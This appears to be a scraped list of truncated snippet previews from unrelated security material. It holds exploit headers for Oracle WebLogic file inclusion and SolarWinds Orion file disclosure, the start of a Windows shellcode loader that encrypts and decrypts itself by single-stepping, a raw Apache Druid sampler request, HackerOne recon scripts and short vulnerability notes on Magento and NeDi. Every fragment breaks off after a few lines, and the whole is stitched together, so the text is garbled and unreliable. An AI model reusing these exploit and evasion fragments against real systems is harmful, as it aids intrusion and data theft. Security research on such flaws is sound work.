| <?php | |
| if (!isset($_SERVER['argc']) || $_SERVER['argc'] < 1) { | |
| die("Usage: cli <action> <options>"); | |
| } | |
| $argc = $_SERVER['argc']; | |
| $argv = $_SERVER['argv']; | |
| switch ($argv[1]) { | |
| case "ls": | |
| echo "Listing directory"; |
| # Exploit Title: Oracle WebLogic Server 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 Local File Inclusion | |
| # Date: 25/1/2022 | |
| # Exploit Author: Jonah Tan (@picar0jsu) | |
| # Vendor Homepage: https://www.oracle.com | |
| # Software Link: https://www.oracle.com/middleware/technologies/weblogic-server-installers-downloads.html | |
| # Version: 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0 | |
| # Tested on: Windows Server 2019, WebLogic 12.2.1.3.0, Peoplesoft 8.57.22 | |
| # CVE : CVE-2022-21371 | |
| # Description |
| #include <Windows.h> | |
| LONG SingleStepEncryptDecrypt(EXCEPTION_POINTERS* ExceptionInfo); | |
| typedef VOID(__stdcall* Shellcode)(); | |
| LPBYTE ShellcodeBuffer; | |
| ULONG_PTR PreviousOffset; | |
| ULONG_PTR CurrentOffset; | |
| ULONGLONG InstructionCount; | |
| DWORD dwOld; |
| #!/bin/bash | |
| # Update the scope of your HackerOne programs | |
| h1name="<your-hackerone-username>" | |
| apitoken="<your-hackerone-api-token>" | |
| next='https://api.hackerone.com/v1/hackers/programs?page%5Bsize%5D=100' | |
| for p in $(bbrf programs where platform is hackerone --show-empty-scope); do | |
| h1id=$(bbrf show $p | jq -r .tags.h1id) |
| #!/bin/bash | |
| # Initiate new BBRF programs from your public and private HackerOne programs | |
| h1name="<your-hackerone-username>" | |
| apitoken="<your-hackerone-api-token>" | |
| next='https://api.hackerone.com/v1/hackers/programs?page%5Bsize%5D=100' | |
| while [ "$next" ]; do |
April 28th I've found a endpoint in a thirth party module Klaviyo Magento 2 which allows to read private customer data from stores. It works by reclaiming any guest-cart as your own and reading the private data for the orders in the Magento API.
| POST /druid/indexer/v1/sampler HTTP/1.1 | |
| Host: x.x.x.x:8888 | |
| User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.16; rv:85.0) Gecko/20100101 Firefox/85.0 | |
| Accept: application/json, text/plain, */* | |
| Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 | |
| Content-Type: application/json | |
| Content-Length: 1045 | |
| Connection: close | |
| #include <IOKit/IOKitLib.h> | |
| #include <mach/mach.h> | |
| #include <stdio.h> | |
| #include <stdint.h> | |
| #include <stdlib.h> | |
| #include <ctype.h> | |
| void hexdump(void *ptr, int buflen) { | |
| unsigned char *buf = (unsigned char*)ptr; | |
| int i, j; |
| # CVE-2020-10148 (local file disclosure PoC for SolarWinds Orion aka door to SuperNova ? ) | |
| # @0xSha | |
| # (C) 2020 0xSha.io | |
| # Advisory : https://www.solarwinds.com/securityadvisory | |
| # Mitigation : https://downloads.solarwinds.com/solarwinds/Support/SupernovaMitigation.zip | |
| # Details : https://kb.cert.org/vuls/id/843464 | |
| # C:\inetpub\SolarWinds\bin\OrionWeb.DLL | |
| # According to SolarWinds.Orion.Web.HttpModules |
| Product: NeDi - Find IT | |
| CVE: CVE-2020-23989 | |
| Version: 1.9C | |
| Vulnerability: Reflected Cross-Site Scripting | |
| Vulnerability Description: NeDi 1.9C allows Cross-Site Scripting via "oid" parameter at "pwsec.php" page. |
